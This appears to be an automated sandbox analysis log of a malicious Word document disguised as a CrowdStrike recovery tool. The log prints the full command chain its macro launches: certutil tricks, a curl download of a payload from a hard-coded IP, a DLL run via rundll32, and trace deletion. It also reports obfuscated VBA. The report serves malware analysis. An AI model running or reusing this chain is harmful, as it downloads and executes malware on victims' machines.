Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain

Source: C:\Windows\System32\cmd.exe	Section loaded: winbrand.dll	Jump to behavior
Source: C:\Windows\System32\xcopy.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\xcopy.exe	Section loaded: ifsutil.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: certcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptui.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: certcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptui.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: certcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptui.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: winbrand.dll
Source: C:\Windows\System32\xcopy.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\xcopy.exe	Section loaded: ifsutil.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: certcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptui.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: certcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptui.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: certcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptui.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: dwmapi.dll	Jump to behavior

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.LNK.0.dr

LNK file: ..\..\..\..\..\Desktop\New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm

Source: C:\Windows\System32\rundll32.exe	Automated click: OK
Source: C:\Windows\System32\rundll32.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	Initial sample: OLE zip file path = word/media/image1.jpg
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	Initial sample: OLE zip file path = word/media/image2.jpg
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	Initial sample: OLE zip file path = word/media/image3.jpg
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	Initial sample: OLE zip file path = docProps/custom.xml
Source: ~WRC0001.tmp.16.dr	Initial sample: OLE zip file path = word/media/image1.jpg
Source: ~WRC0001.tmp.16.dr	Initial sample: OLE zip file path = word/media/image2.jpg
Source: ~WRC0001.tmp.16.dr	Initial sample: OLE zip file path = word/media/image3.jpg
Source: ~WRC0001.tmp.16.dr	Initial sample: OLE zip file path = docProps/custom.xml
Source: ~WRC0000.tmp.16.dr	Initial sample: OLE zip file path = word/glossary/settings.xml
Source: ~WRC0000.tmp.16.dr	Initial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
Source: ~WRC0000.tmp.16.dr	Initial sample: OLE zip file path = word/glossary/document.xml
Source: ~WRC0000.tmp.16.dr	Initial sample: OLE zip file path = word/glossary/fontTable.xml
Source: ~WRC0000.tmp.16.dr	Initial sample: OLE zip file path = word/glossary/webSettings.xml
Source: ~WRC0000.tmp.16.dr	Initial sample: OLE zip file path = word/glossary/stylesWithEffects.xml
Source: ~WRC0000.tmp.16.dr	Initial sample: OLE zip file path = word/glossary/styles.xml

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\Google	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\Google\GoogleUpdater	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\chrome_BITS_3236_441263539	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Source: ~WRF{3AA38F7F-7D95-4F50-A501-E291FEC70BAA}.tmp.0.dr

Initial sample: OLE indicators vbamacros = False

Data Obfuscation

Document contains an embedded VBA with many string operations indicating source code obfuscation

Source: VBA code instrumentation

OLE, VBA macro, High number of string operations: Module ThisDocument

Name: ThisDocument

Source: C:\Users\user\AppData\Local\Temp\curl.exe

Code function: 7_2_000000013F4A1D84 GetModuleHandleA,GetProcAddress,_mbspbrk,LoadLibraryA,GetProcAddress,GetSystemDirectoryA,GetSystemDirectoryA,LoadLibraryA,

7_2_000000013F4A1D84

Source: curl.exe.4.dr

Static PE information: section name: _RDATA

Source: C:\Windows\System32\xcopy.exe

File created: C:\Users\user\AppData\Local\Temp\curl.exe

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
